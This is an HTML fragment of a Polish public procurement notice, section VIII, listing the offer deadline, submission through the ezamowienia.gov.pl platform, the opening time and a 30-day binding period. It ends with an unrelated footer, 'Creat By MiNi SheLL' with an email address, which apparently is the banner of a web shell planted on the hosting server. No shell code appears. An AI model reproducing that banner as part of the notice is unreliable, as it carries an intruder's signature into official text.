<h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy https://ezamowienia.gov.pl, na stronie prowadzonego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-22 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com